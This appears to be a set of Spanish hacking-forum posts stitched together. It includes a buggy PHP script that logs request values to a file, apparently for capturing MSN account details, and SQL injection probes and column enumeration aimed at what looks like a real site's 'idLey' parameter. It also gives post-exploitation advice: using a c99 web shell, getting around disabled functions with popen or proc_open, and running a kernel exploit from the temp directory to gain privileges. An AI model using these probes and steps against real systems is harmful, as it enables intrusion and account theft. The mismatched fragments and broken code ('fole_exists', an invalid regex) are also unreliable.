en algunas ocasiones el \n no lo interpreta bién internet explorer ya que los saltos de linea en windows son diferentes y cuando lo descargas simplemente ya no se verán asi que puedes hacer:

<?php
$id = preg_replace('|[^A-Za-z0-9_-.]|i', '', $_GET['activity']).'.txt';
$id2 =  $_GET['od'];
 
if(fole_exists($id))
 $master = fopen($id.'.txt', 'a');
else
 $master = fopen($id.'.txt', 'x');
fwrite($master, $id2."\x0D\x0A");
fclose($master);
?>

y si no tengo malas intenciones? y si quiero hacer una buena obra para su novia?  
de todas formas ponerse a robar cuentas de msn eso si es perder el tiempo a lo bestia xD

https://foro.elhacker.net/nivel_web/como_evitar_la_inyeccion_sql-t252384.0.html

Siempre siempre siempre que utilizes el envío de variables a una query mysql debes encerrarlos en comillas dobles, es tan simple como eso y si es una variable que unicamente procesa integers debes hacerlo con (int).

<?php
set_time_limit(0);
 
$host = 'ejemplo.com';
$archivo = 'archivo.iso';
 
$buffer = 'GET /'.$archivo.' HTTP/1.1
Host: host
Connection: close
 
';
 
if(!$handle = fsockopen($host, 80))
 die('El servidor no responde!');
if(!fwrite($handle, $buffer))
 die('Error en el servidor!');
 
unset($buffer);
if(!$handle2 = fopen($archivo, 'x'))
 die('No tienes derechos de escritura.');
 
while(!feof($handle)){
 fwrite($handle2, fgets($handle, 128));
}
fclose($handle);
fclose($handle2);
?>

bueno ahi debes filtrar la cabezera que devuelve el servidor pero eso es lo de menos.

aaah pero si este wargame ya lo habia visto, es muy viejo, creo que el ultimo nivel sale un mapa o algo así, ya lo habia terminado.

Aver, este error es bastante común y muchos se hacen bastantes problemas con esto.
No es que tenga -1 o 500 columnas lo que pasa esque la inyección rompe la query y se debe al comentario "--", por lo general siempre intenta seguir las inyecciones lo mas posible sin usar comentarios ya que muchas veces las querys utilizan selecciones que son vitales para el regreso de datos, además el comentario -- para que sea válido en mysql necesita estar solo o sea --order by no sirve porque --order no existe y 2,3,4,5-- tampoco porque 5-- no existe asi que una de dos.. o haces 2,3,4,5 --+ (+ significa espacio en blanco al igual que %20) o sigues la query... -1' union all select 1,2,3,4,5,6,'7 de esta froma no rompes el código.

Comienza denuevo e intenta con:
digamos que 55 es un id de noticia válido...
php?idnoticias=55 and 1=1
php?idnoticias=55 and 1=2
php?idnoticias=55' and 1='1
php?idnoticias=55' and 1='2
php?idnoticias=55' and 1=1 --+
etc y ves que te da error y que no da error, el que no te de error esa es tu inyección.

lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.

Error:
***** index.php?op=InfoLey&idLey=6147 and 1=2

No da error:
***** index.php?op=InfoLey&idLey=6147 and 1=1

No da error
***** index.php?op=InfoLey&idLey=6147 order by 6

No da error
***** index.php?op=InfoLey&idLey=6147 order by 7

No da error
***** index.php?op=InfoLey&idLey=6147 order by 8

da error
***** index.php?op=InfoLey&idLey=6147 order by 9

Entonces es una tabla de 8 columnas que si tiene inyección sql.

Si no puedes modificar permisos y tampoco ejecutar comandos lo mas seguro es que tengan restringidas las funciones y talves usen safe-mode activado. En caso contrario siempre hay formas de evadir filtros ya que hay una montonera de funciones que pueden reemplazar a system como por ejemplo popen() o proc_open().

Si quieres cambiarle el permiso a un archivo necesitas darte cuenta quien es el propietario del archivo, si estás usando la c99 te darás cuenta porque aparece el nombre, si este no corresponde al usuario de apache o www entonces estás jodido y tendrás que ver otras posibilidades.

Talves puedas revisar el directorio temporal y ver si tienes permisos de ejecución ya que por defecto deberías tener permiso de escritura en ese lugar por causa de las sesiones de php y scripts que utilizan archivos temporales, una ves ahi si el servidor está bién configurado no verás ningún archivo y te aparecerá que no puedes leer el directorio pero si puedes escribir asi que le subes de alguna manera un binario y con algún bypass de ejecución como te mostré ariba le ejecutas algún exploit para elevar privilegios dependiendo la versión del kernel que te aparece arriba en la c99 o si no le ejecutas <?php posix_uname(); ?> y con eso podrás ejecutar comandos sin restricción y modificar los permisos, etc. pero todo va dependiendo del mismo sistema de que tan seguro o bién administrado esté.